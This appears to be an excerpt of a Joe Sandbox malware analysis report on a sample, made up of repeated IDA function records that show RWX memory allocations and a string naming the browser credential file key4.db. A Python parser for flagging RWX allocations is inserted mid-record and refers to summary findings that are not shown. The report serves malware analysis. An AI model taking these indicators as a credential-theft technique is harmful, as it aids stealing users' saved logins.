                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C65CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: d66a9d6338a3047f72b49618d06dab52e5eb92c045a9b538b767dfaca9e576d2
                    • Instruction ID: a0017c1a943b89f2edcdb558605f2255713b18e471041f6d2b50d2d94c760290
                    • Opcode Fuzzy Hash: d66a9d6338a3047f72b49618d06dab52e5eb92c045a9b538b767dfaca9e576d2
                    • Instruction Fuzzy Hash: 2A318DB11083819FE325CF14C845B6BB7E9BB84314F104A2DE6A98B3D1CBB49909CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E17D5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E181F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 5ea76a4a6339d6bc05f726adde391ecb7fd3f3b2f1eee07f04d43b8dc45ecc7d
                    • Instruction ID: 2bfac2a8aad244b1566bea1daf2e46f9e04a9a84c84bcf45d288fcee6cff0a21
                    • Opcode Fuzzy Hash: 5ea76a4a6339d6bc05f726adde391ecb7fd3f3b2f1eee07f04d43b8dc45ecc7d
                    • Instruction Fuzzy Hash: 5831CE71205314AFE326CF15C845B2FBBE8EB80354F19861CF9A88B3D0C7B59849CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C28BC
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C2926
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: fba03102fb120dd67aaacf7b53be904260fde67292e7197239b74915968861dc
                    • Instruction ID: 18fcc77ec2959b5298565ec46ea11ba739ecc427d611fcd71747b3e323da7803
                    • Opcode Fuzzy Hash: fba03102fb120dd67aaacf7b53be904260fde67292e7197239b74915968861dc
                    • Instruction Fuzzy Hash: 09315A712407419FD326CF24C845F67B3E9AB84314F148B1CE6A69BBD0DBB5B805CBA0
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CC68E
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CC6DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: ea91852f520593792458c5ef94fa33ff96d145bb7e425f9021a7de53deccacb0
                    • Instruction ID: e21eb138add9329cf2432613be1673e2cf2917262c4da16c58db1d14940b7568
                    • Opcode Fuzzy Hash: ea91852f520593792458c5ef94fa33ff96d145bb7e425f9021a7de53deccacb0
                    • Instruction Fuzzy Hash: 6D312675101B108FD335CF28C985B26B7F8FB48314F548A1CD6AAC7A90D7B5B805CB50
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003CEE44
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003CEE93
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 91a59e262c3105cb4f2c4753a60d04683a283eb569a20b7cdfa194eebce76634
                    • Instruction ID: fb40e37e7c4945ecb6628b8256a1a7302a5e751292184a4bc0cf0fcbbac6c787
                    • Opcode Fuzzy Hash: 91a59e262c3105cb4f2c4753a60d04683a283eb569a20b7cdfa194eebce76634
                    • Instruction Fuzzy Hash: F821F271101B008FE725CF24C985F67B7F9BB48704F108A1DE5A68BAA0D7B4B908CB94
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C73AC
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C73F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: c54056eb46a7d9f0fcbda7af763c341647035f7624d881e49389bec921a03fb8
                    • Instruction ID: d70bd9e853157b1ce9bd0c52086aedc3269003579355737a5f14d4ed60989ba3
                    • Opcode Fuzzy Hash: c54056eb46a7d9f0fcbda7af763c341647035f7624d881e49389bec921a03fb8
                    • Instruction Fuzzy Hash: 20318C711193819FD315CF18C880B6AB7E9FB88348F144A1CFAA5D73A0C7B5E905CB96
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E16A5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E16EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 204a99081eac19257071fb9cb4bb73255d97f66f9b6362395107cc0fc9718994
                    • Instruction ID: 5d6e75cb8b712970513970c82decd5a4355a339f7ddb556bd0d2a344ce88ba40
                    • Opcode Fuzzy Hash: 204a99081eac19257071fb9cb4bb73255d97f66f9b6362395107cc0fc9718994
                    • Instruction Fuzzy Hash: 9B21FFB11093059FE311CF05C844B2BBBE8FB84304F058A1CF9A48B3D0C7B59948CBA2
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 003C682A
                    • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C6882
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 04437d4f3570691052f284f4cd7d77fc69762bf713baf8b64d4ba48c2eec98f9
                    • Instruction ID: 5252c28aee404896e445c48755bb3a9eedc5931fae1e8e2f39085c6153cbaac6
                    • Opcode Fuzzy Hash: 04437d4f3570691052f284f4cd7d77fc69762bf713baf8b64d4ba48c2eec98f9
                    • Instruction Fuzzy Hash: 38218EB12183408FE325CF14C845BAFB7E8FB89304F104A1CE5A99B391C7B49909CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003DF281
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003DF2DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 2b6279170fa6dbe38ccb25c6a003c6a62a0143b8c722d7043221d34affefb8bf
                    • Instruction ID: 0e5f004eed0728b9ef45a46f9a934e1523e51eea67beb6faff6ff038a032bc10
                    • Opcode Fuzzy Hash: 2b6279170fa6dbe38ccb25c6a003c6a62a0143b8c722d7043221d34affefb8bf
                    • Instruction Fuzzy Hash: BE219E76108301AFD301CF14D840B2FBBE8EB89354F108A1DFAA597390D3B1D944CBA2
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C7D03
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003C7D46
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 9730111c946ec418bca7b27c3fbe911de3d52f1cc7f6312cb3c1be1d853ddfcb
                    • Instruction ID: 9b0529c3eee736e0d238017998e4d737d87202b5eec67f20e02e8f3149f8d51d
                    • Opcode Fuzzy Hash: 9730111c946ec418bca7b27c3fbe911de3d52f1cc7f6312cb3c1be1d853ddfcb
                    • Instruction Fuzzy Hash: 04318C71A1121A8FDB15CF98C885BEEB7B8FB08314F144218E921FB390C7B59A05CFA4
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 003E18E5
                    • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 003E193A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
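The NtAllocateVirtualMemory / NtFreeVirtualMemory records above print their arguments as raw hex, so the reader has to know that 00003000 is MEM_COMMIT|MEM_RESERVE, 00000040 is PAGE_EXECUTE_READWRITE and 00008000 is MEM_RELEASE to see that each of these functions carves out a small RWX region, uses it, and releases it. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses API lines in the report's `Name.MODULE(arg,...), ref: ADDR` form, decodes the flag fields against the Windows SDK constants, and flags allocations that are writable and executable in one step. The sample lines are copied from the records on this page; the column assignments (fourth argument of NtAllocateVirtualMemory read as the region size, fourth argument of NtFreeVirtualMemory as the free type) follow the native prototypes and are an assumption about how the report prints pointer arguments. The handle value 000000FF is carried through undecoded.

```python
import re
from dataclasses import dataclass

# Flag values from the Windows SDK (winnt.h); not taken from the report itself.
ALLOCATION_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
                    0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL",
                    0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECTIONS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PROTECT_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
FREE_TYPES = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# One entry of the report's "APIs" list: Name.MODULE(arg,arg,...), ref: ADDR
API_LINE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Constructed sample input: API lines copied from the function records on this page.
SAMPLE_LINES = [
    "NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003C9E02",
    "NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C9E64",
    "NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 003C6561",
    "NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 003C65CE",
    "RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 003C3242",
]


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # ints, or None where the report printed '?' (value not recovered)
    ref: int     # address of the call site inside the dumped image


def parse_api_line(line):
    """Parse one report API line; returns None for lines in another format."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16) for a in m.group("args").split(",")]
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def decode_flags(value, table):
    """Expand a bitmask into SDK names; bits the table does not know stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) or "0"


def decode_protect(value):
    """Low byte is the base protection; higher bits are modifiers such as PAGE_GUARD."""
    base = PAGE_PROTECTIONS.get(value & 0xFF, hex(value & 0xFF))
    mods = [name for bit, name in PROTECT_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


def analyze(lines):
    """Decode every parsable API line and attach review notes for risky allocations."""
    results = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        entry = {"name": call.name, "ref": call.ref, "notes": []}
        if call.name == "NtAllocateVirtualMemory" and len(call.args) == 6:
            # Prototype: (ProcessHandle, *BaseAddress, ZeroBits, *RegionSize, AllocationType, Protect)
            size, alloc, prot = call.args[3], call.args[4], call.args[5]
            entry["size"] = size
            entry["alloc"] = None if alloc is None else decode_flags(alloc, ALLOCATION_TYPES)
            entry["protect"] = None if prot is None else decode_protect(prot)
            if prot is not None and (prot & 0xFF) in EXECUTABLE:
                entry["notes"].append("executable mapping requested at allocation time")
            if prot is not None and (prot & 0xFF) == 0x40:
                entry["notes"].append("RWX: writable and executable in one step, no W^X transition")
        elif call.name == "NtFreeVirtualMemory" and len(call.args) == 4:
            # Prototype: (ProcessHandle, *BaseAddress, *RegionSize, FreeType)
            free = call.args[3]
            entry["free"] = None if free is None else decode_flags(free, FREE_TYPES)
        results.append(entry)
    return results


def rwx_allocations(results):
    """Call-site addresses of allocations that asked for PAGE_EXECUTE_READWRITE."""
    return [r["ref"] for r in results if r.get("protect") == "PAGE_EXECUTE_READWRITE"]


if __name__ == "__main__":
    decoded = analyze(SAMPLE_LINES)
    for r in decoded:
        print(f"{r['ref']:08X} {r['name']}", {k: v for k, v in r.items() if k not in ('name', 'ref')})
    print("RWX allocations at:", [f"{a:08X}" for a in rwx_allocations(decoded)])
```

Running it over the two allocate/free pairs yields sizes 0x10 and 0xB8, MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE, and MEM_RELEASE on the matching frees; the RtlExpandEnvironmentStrings line is parsed but gets no notes. Pointing the same parser at every "APIs" list in the report gives a quick count of how many functions in the image follow this allocate-RWX-then-release pattern, which is the signal behind the "Overwrites code with unconditional jumps" and string-decryption findings in the summary.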
                    • Opcode ID: df00cb3ab5990c7cb9628f9845e60fcfc483e8a6db40e3fcdbe839b2e2647862
                    • Instruction ID: 750ce10143a42f23cea497123087ec0788ee7b8b98ed4972da32daad9a70bc80
                    • Opcode Fuzzy Hash: df00cb3ab5990c7cb9628f9845e60fcfc483e8a6db40e3fcdbe839b2e2647862
                    • Instruction Fuzzy Hash: 9F218972108315AFD711CF14C884B6FBBE8EB84764F048A1DFAA587290D7B59D48CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: TaC
                    • API String ID: 0-130487730
                    • Opcode ID: 389cee3d4bbf4a6f4318e1813e99b7f08e89cadd41f2d742c30cc27bdceabc53
                    • Instruction ID: 256e0b18692ab636e8574e4a4a51544f5cf8fc3fe9e26ec55ce31c85879a58e6
                    • Opcode Fuzzy Hash: 389cee3d4bbf4a6f4318e1813e99b7f08e89cadd41f2d742c30cc27bdceabc53
                    • Instruction Fuzzy Hash: 35E1BDB1504B418FD322CF28C881B52BBE2BF49314F148B6DD5AA8BB92E735F845CB50
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: ,
                    • API String ID: 0-3772416878
                    • Opcode ID: 7bf9758f8d54414b0acb59c82a151e1dad3385d54cf96b2a23e51dbb0805f56c
                    • Instruction ID: 4a714e7d76b09042d885f3a6f8572e0b394ebc9cd42054e11fdb165f59018967
                    • Opcode Fuzzy Hash: 7bf9758f8d54414b0acb59c82a151e1dad3385d54cf96b2a23e51dbb0805f56c
                    • Instruction Fuzzy Hash: B1B15A711083859FD315CF28C84565BFBE0AFA9308F444A2DF59897782D375EA28CB96
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: \key4.db
                    • API String ID: 0-2908133219
                    • Opcode ID: 8ed7f3e0638b35094f87ca31b834958beedcdc7109c42454e8f02b1d63a1ea09
                    • Instruction ID: d90ae42f8380347e48b9712621b471252c55792d114972afb7de0c4d86a29f01
                    • Opcode Fuzzy Hash: 8ed7f3e0638b35094f87ca31b834958beedcdc7109c42454e8f02b1d63a1ea09
                    • Instruction Fuzzy Hash: 2A416975524290CAC7628F28EC91B2B3BB8FF58310F05662AE855CF3E1E3399C52CB55
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
